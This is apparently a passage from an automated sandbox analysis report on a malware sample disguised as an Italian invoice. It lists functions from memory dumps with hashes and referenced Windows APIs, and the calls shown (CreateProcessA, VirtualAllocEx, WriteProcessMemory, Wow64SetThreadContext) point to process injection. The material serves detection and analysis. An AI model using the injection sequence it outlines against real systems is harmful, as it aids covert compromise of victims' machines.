API String ID: 0-1467158625
Opcode ID: e212b71683ef623ba7a6eb3b5acdf17e1116578417f830f0fa4c2a0694e0ca3d
Instruction ID: 5994b878ac78375a3911f78425518e2d35525d18b7dda622b9a530775417c4c7
Opcode Fuzzy Hash: e212b71683ef623ba7a6eb3b5acdf17e1116578417f830f0fa4c2a0694e0ca3d
Instruction Fuzzy Hash: 07F1D2B4E11209DFDB18DFA8E4986ACBBB2FF49311F204069E40AA7751DB355D92CF40

Function 076D4FB8 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 076D5298
4'q, xrefs: 076D52A8

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 193b36528bc4d096ae249a9eab4413494bca50be9678a2264d7bae0ae15297a3
Instruction ID: e872134568b43013e8e3d40e8d954e6f8b0a86ba08c57ce847f6c143d291a7fb
Opcode Fuzzy Hash: 193b36528bc4d096ae249a9eab4413494bca50be9678a2264d7bae0ae15297a3
Instruction Fuzzy Hash: 82A102B4E1120ACFDB18DFA9D848AADBBB2BF49311F108029D807A7755DB345D52CF90

Function 076D1E63 Relevance: 2.6, Strings: 2, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 076D1EF9
4'q, xrefs: 076D1F05

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: fd9f90e8b0073eaade7315ca1c049d33beac992d20d24d99ad0bfe62781b6176
Instruction ID: c66a54a772d5467ac20c01469cbfbc779eee42e7682a31dcd60a8effd96c46f1
Opcode Fuzzy Hash: fd9f90e8b0073eaade7315ca1c049d33beac992d20d24d99ad0bfe62781b6176
Instruction Fuzzy Hash: 733102B1F1420E8FDB289A75D4502FABBE2EFC7211B1984AAD5478B351DB71CC42C7A1

Function 076D284C Relevance: 2.6, Strings: 2, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p<q, xrefs: 076D289F
p<q, xrefs: 076D28AB

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: p<q$p<q
API String ID: 0-3560197191
Opcode ID: ee85073bdbe0b5a825da600ee7a5b13a27929abfd862feb40dceeee20251bd69
Instruction ID: aa127c01a4df2004e79e0d2b925071be8fbe082a8ee7452f41af2749591d83ab
Opcode Fuzzy Hash: ee85073bdbe0b5a825da600ee7a5b13a27929abfd862feb40dceeee20251bd69
Instruction Fuzzy Hash: 1C21F8B6F242178FD725867A84202B6B7A2BFC9121B14407BC457CB354DB31CC57C7A2

Function 076D1564 Relevance: 2.5, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XXq, xrefs: 076D1585
XXq, xrefs: 076D15C7

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: XXq$XXq
API String ID: 0-2437993854
Opcode ID: a16ebb48899cd44afadd9a0b7b77850aa90b8e4249e5492c00a760c5999450cf
Instruction ID: 629add793b058b1c80a8f50e3e0d0e716a7ea7f622dccdc9c24a8df9c80cfd75
Opcode Fuzzy Hash: a16ebb48899cd44afadd9a0b7b77850aa90b8e4249e5492c00a760c5999450cf
Instruction Fuzzy Hash: A301D8B1A1014CDBEB149B58E400B9DF7A2EBCA314B118166E90A5B741CF71DC02CB61

Function 0A348BDD Relevance: 2.5, Strings: 2, Instructions: 26COMMON

Download Yara Rule

Strings

", xrefs: 0A348C40
!, xrefs: 0A348C11

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: !$"
API String ID: 0-3796260231
Opcode ID: 5e0f56f0f51ca8bf34c17a9af52e519b4442bebc320dc0ef92f06b7806e73688
Instruction ID: 96d359f00a416e1369977a8804654a94537a0589ab39e18090f485b10ded7862
Opcode Fuzzy Hash: 5e0f56f0f51ca8bf34c17a9af52e519b4442bebc320dc0ef92f06b7806e73688
Instruction Fuzzy Hash: A7F0A974A04118CFD7288B68C888BD87BF0EF0A305F0000E4E218A3A42CB380EC6CF11

Function 0A035C64 Relevance: 1.8, APIs: 1, Instructions: 267processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0A035ED7

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6ae971a8ae0bf4e90cc77a79751be01423cc0b0982f142063d53641ff7ec5c01
Instruction ID: 32c8190f35774a68a4bb56f415ae629ffb52d9d502659bbaef77aa31fb68febc
Opcode Fuzzy Hash: 6ae971a8ae0bf4e90cc77a79751be01423cc0b0982f142063d53641ff7ec5c01
Instruction Fuzzy Hash: 8BA11075D0021C8FDB64CFA9C885BEEBBF1BF09300F14916AE858A7290DB749985CF85

Function 0A035C70 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0A035ED7

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8f180bd69e5061a5de0c128976a027717b7f584144ef238ee0df4740ef0061e0
Instruction ID: 9a8d1897c254c2dd22855c59941cdcc7f84348a0b11551cc1c6574ba2bb4465d
Opcode Fuzzy Hash: 8f180bd69e5061a5de0c128976a027717b7f584144ef238ee0df4740ef0061e0
Instruction Fuzzy Hash: F7A1F075D0021C8FDB64CFA9C885BEEBBF1BF09300F14916AE859A7290DB749985CF45

Function 0A03885D Relevance: 1.7, APIs: 1, Instructions: 191fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 0A0389E3

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: d23c30dc2b2a0988e952b06326a55e6623c5dee6c705364ce1bf3b3005450f90
Instruction ID: 31494a0fc7699c090a0cca2e820a4f9de21e3efdcd57836c8875a6306c68b0d9
Opcode Fuzzy Hash: d23c30dc2b2a0988e952b06326a55e6623c5dee6c705364ce1bf3b3005450f90
Instruction Fuzzy Hash: A8712272D0021C9FEB14CFA9C9857EDBBF1BB49310F28816AE855A7240D7789989CF85

Function 0A038868 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 0A0389E3

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 56842e1350c4d29f052ed0f1490cefc39af6425aef592d49cfa14fb39bd8e1d3
Instruction ID: df4d0376eef16032b37f0a365bf770937c717a9771194fefa1b8b7982d67e1ce
Opcode Fuzzy Hash: 56842e1350c4d29f052ed0f1490cefc39af6425aef592d49cfa14fb39bd8e1d3
Instruction Fuzzy Hash: E1613372D0031CDFEB14CFA9C9457ADBBF5BB09314F28816AE855A7280DB788989CF45

Function 0A036FD8 Relevance: 1.6, APIs: 1, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A037084

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2401eee4356cda249d56d128d82510a26fdf8931e8df9ecfbd51e0afc9341a32
Instruction ID: 53721214157cdf2a08a059e00f3ad3e422517e8e2690f4f809af4278c10a3013
Opcode Fuzzy Hash: 2401eee4356cda249d56d128d82510a26fdf8931e8df9ecfbd51e0afc9341a32
Instruction Fuzzy Hash: 9C41CDB9D05258DFCF10CFA9D580AEEFBB0BB49320F14942AE855B7210D735A945CF64

Function 0A036AE8 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0A036BC3

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 24cc0fd6ccea61f493de1cc16f0b7567fd1ef3fa2c32fd60102d999c14d15fc2
Instruction ID: b8d7ccc35e0e6ec01d0846a4dabd033131edb25e1de16a96a8ad8865c3cbfc9f
Opcode Fuzzy Hash: 24cc0fd6ccea61f493de1cc16f0b7567fd1ef3fa2c32fd60102d999c14d15fc2
Instruction Fuzzy Hash: DF41ABB5D012589FDF14CFA9D980ADEBBF1BB49310F14902AE814B7250C779AA45CF68

Function 0A036AF0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0A036BC3

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 10175874ccbe4735fb25e9e758070211dc836b39496eb06fbb2f1625a478569b
Instruction ID: 2dfb7511e24218a143fe89ddb5ee4a2bce47c72266161b159bccf475f2856af5
Opcode Fuzzy Hash: 10175874ccbe4735fb25e9e758070211dc836b39496eb06fbb2f1625a478569b
Instruction Fuzzy Hash: 5D41BAB5D012589FCF10CFA9D980AEEFBF5BB49310F14902AE814B7200C779AA45CF68

Function 0A036989 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A036A3A

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 25a20a7072ec23f2d875ad41a21d059418b7a70ecf5922ed507f0f7f228d6ce7
Instruction ID: 462cb56388274fbd5eeb74324ddee72b0ebdfe1be177d98f709a776748bdb753
Opcode Fuzzy Hash: 25a20a7072ec23f2d875ad41a21d059418b7a70ecf5922ed507f0f7f228d6ce7
Instruction Fuzzy Hash: 493198B9D002589FDF14CFA9D980A9EFBB1BB49310F14902AE815BB310D735A901CF69

Function 0A036990 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A036A3A

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d7770f4f14030d1cb957077cdc39e985a98c791940eff9faf2e8fb5b56d8d339
Instruction ID: a864841fe811dd7fd6d94d28d4e9ea18b68c213f880893498770050a7672f0fe
Opcode Fuzzy Hash: d7770f4f14030d1cb957077cdc39e985a98c791940eff9faf2e8fb5b56d8d339
Instruction Fuzzy Hash: 7E3188B9D012589FCF14CFA9D980ADEFBB5BB49310F14942AE815B7310D735A941CF68

Function 0A036FE0 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A037084

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8b1ac0cc380e4720c322306a25b8b714f043faf066a597a7d1b0e2cffd1d970a
Instruction ID: 3ce5e59721486c7f99280a6b8a25913fc10f60e161cd5c83ae2becdf58bcd175
Opcode Fuzzy Hash: 8b1ac0cc380e4720c322306a25b8b714f043faf066a597a7d1b0e2cffd1d970a
Instruction Fuzzy Hash: 0531A9B5D01258DFDF14CFAAD980AEEFBB4AB09310F14942AE815B7210D739A945CF68

Function 0A0EDAB0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0A0EDB54

Memory Dump Source

Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f455728d3a9eefc78b66b2ad629411322b894e61875c5e98db241c5239c6e553
Instruction ID: 1b291867012daec0bd5bdd02ffd86eebd6df86b074e75fd46f674627b0747d06
Opcode Fuzzy Hash: f455728d3a9eefc78b66b2ad629411322b894e61875c5e98db241c5239c6e553
Instruction Fuzzy Hash: EE3186B9D012589FDF14CFAAD980A9EFBB1BB49310F14942AE814B7210D735A945CF68

Function 0A036429 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0A0364DF

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c9b8d2f7bbcc84d1aa891adb940239bcb47c63a592a0255f56a41a061912039f
Instruction ID: 67d01d075abe2e5c72942de687789c81775d64c1cca753b3ef5f3ff2630cc072
Opcode Fuzzy Hash: c9b8d2f7bbcc84d1aa891adb940239bcb47c63a592a0255f56a41a061912039f
Instruction Fuzzy Hash: 7941BBB5D01258AFDB14DFA9D984AEEBBF0BF49310F24802AE814BB240D7799945CF64

Function 0A036430 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0A0364DF

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f9553db158b9de7e58959ca3fdfc67b52e75fe85cc1a9eed671299eca486c192
Instruction ID: 64f9f44814939bd78d2325b086122ebd494f52995bd6dd0e87a5220b4716dd37
Opcode Fuzzy Hash: f9553db158b9de7e58959ca3fdfc67b52e75fe85cc1a9eed671299eca486c192
Instruction Fuzzy Hash: A731BCB5D01258AFDB14CFAAD984AEEFBF4BF48310F14802AE414B7240D739A945CF68

Function 0A0EEC78 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 0A0EED17

Memory Dump Source

Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 769be05aa3726aecb81634460d01b8195cff61aa8294b5a6bb3f59a558b86245
Instruction ID: 27ab78694447851a1484331515cdeb5ca24b1bd497fba41444498a9333786c8d
Opcode Fuzzy Hash: 769be05aa3726aecb81634460d01b8195cff61aa8294b5a6bb3f59a558b86245
Instruction Fuzzy Hash: BD3198B9D0525CAFDF14CFA9D980A9EFBB0BF49310F14942AE814B7210D735A945CF68

Function 076D479C Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

4'q, xrefs: 076D4F69

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 2b0cedb07f3ca12bdd650d18b793f709a6d00c7d5c71e2bbd4d9429d770b278e
Instruction ID: bf0ae293179450ac6faa21daac017b1524a5faaf38b8139242c577be4beb3592
Opcode Fuzzy Hash: 2b0cedb07f3ca12bdd650d18b793f709a6d00c7d5c71e2bbd4d9429d770b278e
Instruction Fuzzy Hash: FE3171B4D14289CFDB15CFA5D4146EEBFB1EF86311F0481AAD812A7291CB384E46CF91

Function 02F9AEB0 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

8q, xrefs: 02F9AF14

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 8q
API String ID: 0-4083045702
Opcode ID: 9a564c7f00645d3b51ddc44ec9d85a249994d476a20bf9abedbaac48eac04bb4
Instruction ID: 52a18cae4d6345d3e4dba630ae26d6c7fd150d9e0d468de4ad0e58c7121552ae
Opcode Fuzzy Hash: 9a564c7f00645d3b51ddc44ec9d85a249994d476a20bf9abedbaac48eac04bb4
Instruction Fuzzy Hash: FC11C234700308CFE315973AE448B66BBEAFBC9354F5584A5E146CB2A5CB389C82C751

Function 02F9AEC0 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

8q, xrefs: 02F9AF14

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 8q
API String ID: 0-4083045702
Opcode ID: 6a629828892a1643a88f532837a812f8e4e6569a416bd0b2adaebfa5ea3d9c23
Instruction ID: 28314ac59b00e3c57d2417d8d7a4a2e15ff00396919a52de97300a3e760393a3
Opcode Fuzzy Hash: 6a629828892a1643a88f532837a812f8e4e6569a416bd0b2adaebfa5ea3d9c23
Instruction Fuzzy Hash: B401C035700208CFE715973AE44CB667BEAFBC8354F558464E20A8B2A4CB349C42C750

Function 02F98351 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695d97d4fd01e703abfa5e171f8a33b1108d46318b623e9164b4f9840018856b
Instruction ID: 55a7b9782d6a0a1dc31e73d13c74c03b95c8406359d2d379f7d3da0644e0f210
Opcode Fuzzy Hash: 695d97d4fd01e703abfa5e171f8a33b1108d46318b623e9164b4f9840018856b
Instruction Fuzzy Hash: 05D116357002049FDB18DF68C980AAD77F2FF89764B5085A8E9069F361DB31ED46CBA0

Function 02F97608 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 781759d25c89243b510f1f37c4865b9dd1e4ff0e029683fbaae7200801f6d514
Instruction ID: e2d70e9614af47ce5821342ae9b33bb54a2369ce8d69445cd9ee1d2217cd9f9f
Opcode Fuzzy Hash: 781759d25c89243b510f1f37c4865b9dd1e4ff0e029683fbaae7200801f6d514
Instruction Fuzzy Hash: 60C1CC71A103089FEB14EFA9D844AADFBB2FF88354F158559E5069F364CB34AD49CB80

Function 02F92E10 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 969326903b230d719311da49a0b383beca92e7fd7f6923c20a789490d9027cc7
Instruction ID: c8aadea539449ee3c07684e21138ede2363050d7d221f7ee3502c7d6bf851cc5
Opcode Fuzzy Hash: 969326903b230d719311da49a0b383beca92e7fd7f6923c20a789490d9027cc7
Instruction Fuzzy Hash: 6091D070A00205DFDB19CF58C494AAEFBB1FF48314B258299D915DB3A1C736EC91CBA4

Function 02F97DD0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd0c6ba6c5e63e2a6c3f3a2ea785108cf0cfab056ca036bf67ac9f646b00e577
Instruction ID: 04d00a48934e62ab3de8c314b95869624c40828d3fec67b33be7f6410f844f1c
Opcode Fuzzy Hash: cd0c6ba6c5e63e2a6c3f3a2ea785108cf0cfab056ca036bf67ac9f646b00e577
Instruction Fuzzy Hash: 5971CE30A003088FEB24DF68D890AEDFBF6FF85394F14896AD1159B651DB71AC46CB90

Function 02F97F3E Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7782598086e2631949c52015ea0151cc9640f21527dc23e2a4d1196ce257527
Instruction ID: c62c6d2a1c7613a7905fdde0fac48233e15c42472047d2de3f4f7b5a030165da
Opcode Fuzzy Hash: d7782598086e2631949c52015ea0151cc9640f21527dc23e2a4d1196ce257527
Instruction Fuzzy Hash: 63717170E002089FEF14DFA4D890BADBBF2BF85394F148569D512AB760DB34AD46CB90

Function 02F9FB20 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7e9f4543419c53e67cdbe27c438e7ac2ad475b7d2d7bca8ccfe67a3b8268e5
Instruction ID: ed89faa2b4f82b4a3723299b16f04da885aae34ec4e6acc5f8ec8d61172f7595
Opcode Fuzzy Hash: 4f7e9f4543419c53e67cdbe27c438e7ac2ad475b7d2d7bca8ccfe67a3b8268e5
Instruction Fuzzy Hash: 82714931A1420ACFEB14CF58D5A8B99F7B2FB88350F15C266E515DBB99C734E881CB50

Function 0A35BD18 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09fb405ef465df21d4d41bd08b0e9ba13bc5ebe86d6d552e60146ff585d89eb7
Instruction ID: d09ec5ae7734c98e08a48c0045cd198dbd120c99e31176a4bec69b60e8693cb6
Opcode Fuzzy Hash: 09fb405ef465df21d4d41bd08b0e9ba13bc5ebe86d6d552e60146ff585d89eb7
Instruction Fuzzy Hash: 7F71E174E0020CEFDB14DFA9E588AAEFBB6EF49304F104029E916AB754DB345945CFA1

Function 02F987E0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9464a17559e1c818d3e97a219f9be6cc08a52bc4652f359de4037d98c6746987
Instruction ID: 9b70e6cf89e58f8cec1947b9f7050294eeba5bd83f38e176af649507d76aeafb
Opcode Fuzzy Hash: 9464a17559e1c818d3e97a219f9be6cc08a52bc4652f359de4037d98c6746987
Instruction Fuzzy Hash: 68515C387002409FDB159FB8D9909AA3BB3FF89314B10497DE9068B761DB32EC45CBA1

Function 02F9E7C0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde1213b545f7d1adef9446af1cd9a5614c0a4bd495c2b8805c5df11c33bd5da
Instruction ID: 9ae9904dfe49b56a469eaa1cec9fe580313d7017581ec7e687fd40e2640a870b
Opcode Fuzzy Hash: fde1213b545f7d1adef9446af1cd9a5614c0a4bd495c2b8805c5df11c33bd5da
Instruction Fuzzy Hash: 8C419231F00208CFEB50CB69E844BAAB7A2EB88355F118577E21AC7660D775D885CB52

Function 02F97B61 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad5eb5733693a9c0a28c55ac575db1df3117f8bb406c39495ff1954690e8e885
Instruction ID: 9fa8343fb8a7eb050b812c58349347363323dc157992eb5cba05b512e5fe5908
Opcode Fuzzy Hash: ad5eb5733693a9c0a28c55ac575db1df3117f8bb406c39495ff1954690e8e885
Instruction Fuzzy Hash: 16417F75F112049FEB18AB24D4546AABBF2EF99790F04446AD606EB3A0DF70AC41CB90

Function 02F97DBB Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

